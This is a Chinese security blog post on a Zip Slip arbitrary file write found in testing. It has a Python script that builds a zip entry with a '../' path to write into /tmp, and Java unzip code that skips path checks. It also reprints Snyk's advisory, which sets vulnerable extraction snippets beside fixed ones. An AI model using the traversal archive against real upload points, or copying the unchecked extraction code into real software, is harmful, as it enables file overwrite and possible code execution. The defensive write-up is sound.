记一次Zip Slip任意文件写漏洞 以及一些参考文章

记一次Zip Slip任意文件写漏洞以及参考文章们

  • 记一次Zip Slip任意文件写漏洞
      • 漏洞复现
      • 漏洞原理分析
      • 扩展延申
  • 参考文章一:Java之解压流(ZipInputStream)
  • 参考文章二:Zip Slip Vulnerability
      • Exploitable Application Flow
      • Are you Vulnerable?
      • What action should you take?
          • 1. Search through your projects for vulnerable code.
          • 2. Add Zip Slip Security Testing to your application build pipeline
  • 参考文章三:snyk/zip-slip-vulnerability

记一次Zip Slip任意文件写漏洞

漏洞复现

第一次在测试中见到这个安全问题,故记录一下。(由于涉及到公司信息,故打码严重,只做简单复现)

首先发现到这里存在一个zip文件上传点:

在这里插入图片描述

于是我们构造特殊的zip压缩文件。

import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
# the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'sec_test.txt'
#destination path of the file
zf.write(fname, '../../../../../../../../../../../../../../../../../../../../../../../../tmp/sec_test.tmp')

然后上传此压缩文件:

在这里插入图片描述

然后登陆服务器,发现tmp目录下出现我们上传的文件sec_test.tmp:

在这里插入图片描述

利用此漏洞,我们可以做到任意文件上传与覆盖。

漏洞原理分析

第一次看到这个漏洞,我想会不会所有的zip解压都会存在这个任意文件写的问题。

于是我将构造的zip放在kali下,想验证这个问题:

在这里插入图片描述

可以看到直接用unzip命令是无法实现目录穿越的,unzip会默认跳过…/。

也许是java解压文件的问题。于是我用默认的java.util.zip.*构造了一段解压文件的代码,尝试是否可以目录穿越。

import java.io. *;
import java.util.zip.*;
import java.util.Scanner;
public class Unzip {/*** @param srcPath zip源文件地址* @param outPath 解压到的目的地址* @throws IOException*/public static void decompressionFile(String srcPath, String outPath) throws IOException {//简单判断解压路径是否合法if (!new File(srcPath).isDirectory()) {//判断输出路径是否合法if (new File(outPath).isDirectory()) {if (!outPath.endsWith(File.separator)) {outPath += File.separator;}//zip读取压缩文件FileInputStream fileInputStream = new FileInputStream(srcPath);ZipInputStream zipInputStream = new ZipInputStream(fileInputStream);//解压文件decompressionFile(outPath, zipInputStream);//关闭流zipInputStream.close();fileInputStream.close();} else {throw new RuntimeException("输出路径不合法!");}} else {throw new RuntimeException("需要解压的文件不合法!");}}/*** ZipInputStream是逐个目录进行读取,所以只需要循环* @param outPath* @param inputStream* @throws IOException*/private static void decompressionFile(String outPath, ZipInputStream inputStream) throws IOException {//读取一个目录ZipEntry nextEntry = inputStream.getNextEntry();//不为空进入循环while (nextEntry != null) {String name = nextEntry.getName();File file = new File(outPath+name);//如果是目录,创建目录if (name.endsWith("/")) {file.mkdir();} else {//文件则写入具体的路径中FileOutputStream fileOutputStream = new FileOutputStream(file);BufferedOutputStream bufferedOutputStream = new BufferedOutputStream(fileOutputStream);int n;byte[] bytes = new byte[1024];while ((n = inputStream.read(bytes)) != -1) {bufferedOutputStream.write(bytes, 0, n);}//关闭流bufferedOutputStream.close();fileOutputStream.close();}//关闭当前目录inputStream.closeEntry();//读取下一个目录,作为循环条件nextEntry = inputStream.getNextEntry();}}public static void main(String[] args) throws IOException {Scanner scan = new Scanner(System.in);System.out.println("请输入zip源文件路径:");String srcPath = scan.nextLine();System.out.println("请输入解压目的地址:");String outPath = scan.nextLine();decompressionFile(srcPath, outPath);}
}

然后运行:

在这里插入图片描述

发现成功实现解压目录穿越。

目录穿越的原因是:代码的第45行nextEntry.getName()函数是为了得到文件的路径。如果将其打印出来则是…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/tmp/sec_test.tmp。这里没有对获取到的路径进行校验,从而直接与outPath目录进行拼接,所以最终解压路径为/root/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/tmp/sec_test.tmp,也就是/tmp

扩展延申

Zip Slip是一个广泛存在的漏洞,除了Java语言,JavaScript,Ruby,.NET和Go都有此问题。

利用此漏洞有两个前提:

有恶意的压缩文件(这一点我们可以自己构造)
提取代码不会执行目录检查。
恶意的压缩文件一般包含…/目录,从而解压时会跳出当前目录。

提取代码一般会得到压缩文件中的文件目录,如果不对这些目录进行校验则会出现slip越问题。

目前snyk正在维护一个GitHub项目,用于列出所有已发现受Zip Slip影响的项目,及其修复情况、补丁版本。如果有需要,可以在上面检验是否正在使用包含Zip Slip漏洞的库。

参考文章一:Java之解压流(ZipInputStream)

一、ZipInputStream相对于ZipOutputStream而言,使用上面简单的多了,相对的,既然存在压缩流,就会存在,解压的方式。

二、解压文件,流的使用过程中也是很常用的,在读取文件,根据文件类型进行处理,这样,就可以做到,最低成本的数据传输了

三、解压例子

/*** 提供给用户使用的解压工具* @param srcPath* @param outPath* @throws IOException*/public static void decompressionFile(String srcPath, String outPath) throws IOException {//简单判断解压路径是否合法if (!new File(srcPath).isDirectory()) {//判断输出路径是否合法if (new File(outPath).isDirectory()) {if (!outPath.endsWith(File.separator)) {outPath += File.separator;}//zip读取压缩文件FileInputStream fileInputStream = new FileInputStream(srcPath);ZipInputStream zipInputStream = new ZipInputStream(fileInputStream);//解压文件decompressionFile(outPath, zipInputStream);//关闭流zipInputStream.close();fileInputStream.close();} else {throw new RuntimeException("输出路径不合法!");}} else {throw new RuntimeException("需要解压的文件不合法!");}}/*** ZipInputStream是逐个目录进行读取,所以只需要循环* @param outPath* @param inputStream* @throws IOException*/private static void decompressionFile(String outPath, ZipInputStream inputStream) throws IOException {//读取一个目录ZipEntry nextEntry = inputStream.getNextEntry();//不为空进入循环while (nextEntry != null) {String name = nextEntry.getName();File file = new File(outPath+name);//如果是目录,创建目录if (name.endsWith("/")) {file.mkdir();} else {//文件则写入具体的路径中FileOutputStream fileOutputStream = new FileOutputStream(file);BufferedOutputStream bufferedOutputStream = new BufferedOutputStream(fileOutputStream);int n;byte[] bytes = new byte[1024];while ((n = inputStream.read(bytes)) != -1) {bufferedOutputStream.write(bytes, 0, n);}//关闭流bufferedOutputStream.close();fileOutputStream.close();}//关闭当前布姆inputStream.closeEntry();//读取下一个目录,作为循环条件nextEntry = inputStream.getNextEntry();}}

四、测试:

public static void main(String[] args) throws IOException {decompressionFile("D:\\srv.zip", "D:\\test");
}

在这里插入图片描述

在这里插入图片描述

参考文章二:Zip Slip Vulnerability

Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution. It was discovered and responsibly disclosed by the Snyk Security team ahead of a public disclosure on 5th June 2018, and affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many more (CVEs and full list here). Of course, this type of vulnerability has existed before, but recently it has manifested itself in a much larger number of projects and libraries.

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand crafted and shared among developer communities such as StackOverflow.

The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. …/…/evil.sh). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. If you’d like the information on this page in a downloadable technical white paper, click the button below.

详情见:https://download.csdn.net/download/weixin_54626591/88279293
或者 Download Technical White Paper

Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive. The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.

Exploitable Application Flow

The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking. Let’s look through each of these in turn. First of all, the contents of the zip file needs to have one or more files that break out of the target directory when extracted. In the example below, we can see the contents of a zip file. It has two files, a good.sh file which would be extracted into the target directory and an evil.sh file which is trying to traverse up the directory tree to hit the root and then add a file into the tmp directory. When you attempt to cd … in the root directory, you still find yourself in the root directory, so a malicious path could contain many levels of …/ to stand a better chance of reaching the root directory, before trying to traverse to sensitive files.

  5 Tue Jun 5 11:04:29 BST 2018 good.sh 20 Tue Jun 5 11:04:42 BST 2018 ../../../../../../../../tmp/evil.sh

The contents of this zip file have to be hand crafted. Archive creation tools don’t typically allow users to add files with these paths, despite the zip specification allowing it. However, with the right tools, it’s easy to create files with these paths.

The second thing you’ll need to exploit this vulnerability is to extract the archive, either using your own code or a library. The vulnerability exists when the extraction code omits validation on the file paths in the archive. An example of a vulnerable code snippet (example shown in Java) can be seen below.

 1   Enumeration<ZipEntry>entries = zip.getEntries(); 2   while (entries.hasMoreElements()) { 3       ZipEntry e = entries.nextElement(); 4       File f = new File(destinationDir, e.getName()); 5       InputStream input = zip.getInputStream(e); 6       IOUtils.copy(input, write(f)); 7   }

You can see on line 4, e.getName() is concatenated with the target directory, dir, without being validated. At this point, when our zip archive gets to our evil.sh, it will append the full path (including every …/) of the zip entry to the target directory resulting in evil.sh being written outside of the target directory.

To see Zip Slip in action, watch us exploit the vulnerable java-goof application , a sample application used to show many known vulnerabilities.

Are you Vulnerable?

You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation. Snyk is maintaining a GitHub repository listing all projects that have been found vulnerable to Zip Slip and have been responsibly disclosed to, including fix dates and versions. The repository is open to contributions from the wider community to ensure it holds the most up to date status.s.

What action should you take?

Here are some steps you can take to check if your project’s dependencies of code contain the Zip Slip vulnerability:

1. Search through your projects for vulnerable code.
  1. java

    As previously mentioned, the Java ecosystem doesn’t offer a central library containing high level processing of archive files. The popular Oracle and Apache commons-compress APIs that are heavily used do offer some archiving support but do not publicly provide the full extract capability. This has contributed to there being more instances of users hand crafting the archive processing code themselves. We observed that the Java ecosystem had many more archive libraries than other ecosystems, many of which were found to be vulnerable .

    Example Vulnerable Code:

    1   Enumeration<ZipEntry> entries = zip.getEntries();
    2   while (entries.hasMoreElements()) { 
    3     ZipEntry e = entries.nextElement(); 
    4     File f = new File(destinationDir, e.getName()); 
    5     InputStream input =zip.getInputStream(e); 6 IOUtils.copy(input, write(f)); 
    7   }
    

    Example Validation Code:

    1   String canonicalDestinationDirPath = destinationDir.getCanonicalPath(); 
    2   File destinationfile = new File(destinationDir, e.getName()); 
    3   String canonicalDestinationFile =  destinationfile.getCanonicalPath();
    4   if (!canonicalDestinationFile.startsWith(canonicalDestinationDirPath + File.separator)) { 
    5       throw new  ArchiverException("Entry is outside of the target dir: " + e.getName()); 
    6   }
    
  2. groovy

    Like Java, Groovy also has vulnerable snippets in various project codebases, as well as making use of all the vulnerable Java archive processing libraries .

    Example Vulnerable Code:

    1   final zipInput = new ZipInputStream(newFileInputStream(self)) 
    2   zipInput.withStream { 
    3     def entry 
    4     while(entry = zipInput.nextEntry) { 
    5       final file = new File(dest, entry.name) 
    6       file.parentFile?.mkdirs()
    7       def output = new FileOutputStream(file) 
    8       output.withStream { 
    9         output << zipInput 
    10      } 
    11      unzippedFiles >> file 
    12  } 
    13 }
    

    Example Validation Code:

    1   final canonicalDestinationDirPath = destinationDir.getCanonicalPath() 
    2   final destinationfile = new File(destinationDir, e.name) 
    3   final canonicalDestinationFile = destinationfile.getCanonicalPath() 
    4   if (!canonicalDestinationFile.startsWith(canonicalDestinationDirPath + File.separator)) { 
    5       throw new ArchiverException("Entry is outside of the target dir: ${e.name}") 
    6   }
    
  3. JavaScript

    JavaScript has benefitted from having more central libraries that provide the functionality to extract from archives and the vulnerable libraries we found before public disclosure were fixed. Note that the join command concatenates the two path parameters and returns the shortest path possible after being resolved.

    Example Vulnerable Code:

    1   self.on('entry', function(entry) { 
    2     entry.pipe(Writer({ 
    3       path: path.join(opts.path,entry.path) 
    4   }))
    

    Example Validation Code:

    1  var filePath = path.join(targetFolder, entry.path); 
    2   if (filePath.indexOf(path.join(targetFolder, path.sep)) != 0) { 
    3      return; 
    4   }
    
  4. .net

    The .Net ecosystem also has central libraries that perform the extraction functionality. In fact the code in the core .Net library that checks for the Zip Slip vulnerability was so neat, we used the implementation as the example reference solution to other libraries and ecosystems.

    Example Vulnerable Code:

    1   public static void WriteToDirectory(IArchiveEntry entry, 
    2                                       string destDirectory, 
    3                                       ExtractionOptions options){ 
    4     string file = Path.GetFileName(entry.Key); 
    5     string destFileName = Path.Combine(destDirectory, file); 
    6     entry.WriteToFile(destFileName, options); 
    7   }

    Example Validation Code:

    1   destFileName = Path.GetFullPath(Path.Combine(destDirectory, entry.Key)); 
    2   string fullDestDirPath = Path.GetFullPath(destDirectory + 
    3   Path.DirectorySeparatorChar); 
    4   if (!destFileName.StartsWith(fullDestDirPath)) { 
    5      throw new ExtractionException("Entry is outside of the target dir: " 
    6      + destFileName); 
    7   }
    
  5. go

    The Go ecosystem only has one vulnerable library that we found which was fixed within two days of us disclosing the issue. Note that the Join command concatenates the two path parameters and returns the shortest path possible after being resolved.

    Example Vulnerable Code:

    1   func (rarFormat) Read(input io.Reader, dest string) { 
    2     rr := rardecode.NewReader(input, "") 
    3     for {
    4       header := rr.Next() 
    5       writeNewFile(filepath.Join(dest, header.Name), rr, header.Mode()) 
    6     } 
    7   }

    Example Validation Code:

    1   func sanitizeExtractPath(filePath string, destination string) error { 
    2   destpath := filepath.Join(destination, filePath) 
    3   if !strings.HasPrefix(destpath, filepath.Clean(destination) 
    4   + string(os.PathSeparator)) { 
    5      return fmt.Errorf("%s: illegal file path", filePath) 
    6    } 
    7    return nil 
    8   }
    
  6. Ruby & Python

    We also vetted the Ruby and Python ecosystems and couldn’t find any vulnerable code snippets or libraries. In fact, Python libraries were vulnerable until fixed in 2014. Ruby has a number of existing vulnerabilities that have been fixed in previous versions here , here and here .

2. Add Zip Slip Security Testing to your application build pipeline

If you’d prefer not to search through your direct and transitive dependencies (of which you likely have hundreds) to determine if you’re using a vulnerable library, you can choose a dependency vulnerability scanning tool, like Snyk. It’s a good practice to add security testing into your development lifecycle stages, such as during development, CI, deployment and production. You can test your own projects (all the ecosystems mentioned above are supported) to determine if they are vulnerable to Zip Slip.

  • Other vulnerable projects

    Vulnerable projects include projects in various ecosystems that either use the libraries mentioned above or directly include vulnerable code. Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarQube, OpenTable, Arduino, ElasticSearch, Selenium, JetBrains and Google.

  • Thank you!

    The Snyk security team would like for thank all the vendors, project owners and the community members that helped raise awareness, find and fix vulnerabilities in projects across many ecosystems.

参考文章三:snyk/zip-slip-vulnerability

详情见:https://github.com/snyk/zip-slip-vulnerability







傲节

常见漏洞汇总

SAUCERMAN

记一次Zip Slip任意文件写漏洞

小不点丶

Java之解压流(ZipInputStream)

Homepage

Zip Slip Vulnerability

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/64971.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

中级深入--day15

案例&#xff1a;使用BeautifuSoup4的爬虫 我们以腾讯社招页面来做演示&#xff1a;搜索 | 腾讯招聘 使用BeautifuSoup4解析器&#xff0c;将招聘网页上的职位名称、职位类别、招聘人数、工作地点、发布时间&#xff0c;以及每个职位详情的点击链接存储出来。 # bs4_tencent.p…

【Linux】线程安全-生产者消费者模型

文章目录 生产者消费者模型123规则应用场景优点忙闲不均生产者和消费者解耦支持高并发 代码模拟 生产者消费者模型 123规则 1个线程安全的队列&#xff1a;只要保证先进先出特性的数据结构都可以称为队列 这个队列要保证互斥&#xff08;就是保证当前只有一个线程对队列进行操…

交换机端口安全

文章目录 一、802.1X认证1. 定义和起源2. 认证方式本地认证远程集中认证 3. 端口接入控制方式基于端口认证基于MAC地址认证 二、端口隔离技术1. 隔离组2. 隔离原理3. 应用场景 首先可以看下思维导图&#xff0c;以便更好的理解接下来的内容。 一、802.1X认证 1. 定义和起源 8…

代码随想录算法训练营第39天 | ● 62.不同路径 ● 63. 不同路径II

文章目录 前言一、62.不同路径二、63.不同路径II总结 前言 动态规划 一、62.不同路径 深搜动态规划数论 深搜&#xff1a; 注意题目中说机器人每次只能向下或者向右移动一步&#xff0c;那么其实机器人走过的路径可以抽象为一棵二叉树&#xff0c;而叶子节点就是终点&#…

uniapp项目实战系列(2):新建项目,项目搭建,微信开发工具的配置

目录 系列文章目录uniapp项目实战系列(1)&#xff1a;导入数据库&#xff0c;启动后端服务&#xff0c;开启代码托管&#xff08;点击跳转&#xff09;1.新建项目2.托管项目的操作&#xff1a;&#xff08;无勾选托管项目可无视&#xff09;3.项目编译预览3.1游览器编译3.2微信…

【数据结构与算法篇】手撕八大排序算法之交换排序

​&#x1f47b;内容专栏&#xff1a; 《数据结构与算法篇》 &#x1f428;本文概括&#xff1a;常见交换排序包括冒泡排序与快速排序&#xff0c;本篇讲述冒泡排序与快速排序的思想及实现、复杂度分析。 &#x1f43c;本文作者&#xff1a; 花 蝶 &#x1f438;发布时间&#…

Darshan日志分析

标头 darshan-parser 输出的开头显示了有关作业的总体信息的摘要。还可以使用–perf、–file或–total命令行选项生成其他作业级别摘要信息。 darshan log version&#xff1a;Darshan 日志文件的内部版本号。compression method&#xff1a;压缩方法。exe&#xff1a;生成日志…

skywalking agent监控java服务

一、前言 skywalking agent可以监控的服务类型有多种&#xff0c;python、go、java、nodejs服务等都可以监控&#xff0c;现在通过java服务来演示skywalking agent的使用&#xff0c;并且是使用容器的方式实现 二、部署skywalking agent监控 需要注意&#xff0c;skywalking…

Django报错:SystemCheckError: System check identified some issues解决办法

今天练习django自定义标签时&#xff0c;一开始在APPbook中写了自定义标签book_tags.py 测试成功&#xff0c;之后新建了一个APPblogs&#xff0c;测试在blogs中创建模板使用自定义标签&#xff0c;于是直接把book/templatetags包直接赋值到blogs目录里。在页面里加载自定义标…

K8s简介之什么是K8s

目录 1.概述 2.什么是容器引擎&#xff1f; 3.什么是容器 4.什么是容器编排&#xff1f; 5.容器编排工具 6.到底什么是K8s? 7.为什么市场推荐K8s 8.K8s架构 9.K8s组件 Pods API 服务器 调度器 控制器管理器 Etcd 节点 Kubelet Kube代理 Kubectl 1.概述 Kub…

通过这 5 项 ChatGPT 创新增强您的见解

为什么绝大多数的人还不会使用chatGPT来提高工作效能&#xff1f;根本原因就在还不会循序渐进的发问与chatGPT互动。本文总结了5个独特的chatGPT提示&#xff0c;可以帮助您更好地与Chat GPT进行交流&#xff0c;以获得更清晰的信息、额外的信息和见解。 澄清假设和限制 用5种提…

vcruntime140_1.dll丢失的三个修复方法,【vcruntime140_1修复工具下载】

大家好&#xff01;今天&#xff0c;我将为大家介绍一个关于计算机vcruntime140_1.dll丢失的问题。在我们的日常生活和学习中&#xff0c;计算机出现问题是常有的事情。有时候&#xff0c;我们可能会遇到一些令人头疼的问题&#xff0c;比如vcruntime140_1.dll丢失。那么&#…

C盘清理 “ProgramData\Microsoft\Search“ 文件夹过大

修改索引存放位置 进入控制面板->查找方式改成大图标&#xff0c; 选择索引选项 进入高级 填写新的索引位置 删除C盘索引信息 删除C:\ProgramData\Microsoft\Search\Data\Applications 下面的文件夹 如果报索引正在使用&#xff0c;参照第一步替换索引位置。关闭索引

stable diffusion实践操作-hypernetworks

系列文章目录 本文专门开一节写hypernetworks的内容&#xff0c;在看之前&#xff0c;可以同步关注&#xff1a; stable diffusion实践操作 提示&#xff1a;写完文章后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 系列文章目录前言一、h…

conda创建python虚拟环境

1.查看当前存在那些虚拟环境 conda env list conda info -e 2.conda安装虚拟环境 conda create -n my_env_name python3.6 2.1在anaconda下改变python版本 当前3.7 安装3.7 conda create -n py37 python3.7 conda activate py37 conda create -n py37 python3.7conda a…

IDM2024Internet Download Manager下载器最新版本

IDM&#xff08;Internet Download Manager&#xff09;下载器主窗口的左侧是下载类别的分类&#xff0c;提供了分类功能来组织和管理文件。如果不需要它&#xff0c;可以删除“分类”窗口&#xff0c;并且在下载文件时不选择任何分类。 每个下载类别都有一个名称&#xff0c;…

路由器的简单概述(详细理解+实例精讲)

系列文章目录 华为数通学习&#xff08;4&#xff09; 目录 系列文章目录 华为数通学习&#xff08;4&#xff09; 前言 一&#xff0c;网段间通信 二&#xff0c;路由器的基本特点 三&#xff0c;路由信息介绍 四&#xff0c;路由表 五&#xff0c;路由表的来源有哪些…

linux安装docker全过程

3. 第二步&#xff1a;设置docker的存储库。就两条命令&#xff0c;我们直接执行就好。 ​ sudo yum install -y yum-utils sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo ​​ 4. 安装docker engine和docker-compose。 执行命…

IP地址、网关、网络/主机号、子网掩码关系

一、IP地址 IP地址组成 IP地址分为两个部分&#xff1a;网络号和主机号 &#xff08;1&#xff09;网络号:标识网段&#xff0c;保证相互连接的两个网段具有不同的标识。 &#xff08;2&#xff09;主机号:标识主机&#xff0c;同一网段内&#xff0c;主机之间具有相同的网…

某人事系统架构搭建设计记录

首发博客地址 https://blog.zysicyj.top/ 先大致列一下基础情况 架构必须是微服务 场景上涉及大量查询操作&#xff0c;分析操作 存在临时大量写入的场景 并发并不高 对高可用要求较高&#xff0c;不能挂掉 对安全要求高 要能过等保测试等三方测试 使用人数并不多&#xff0c;十…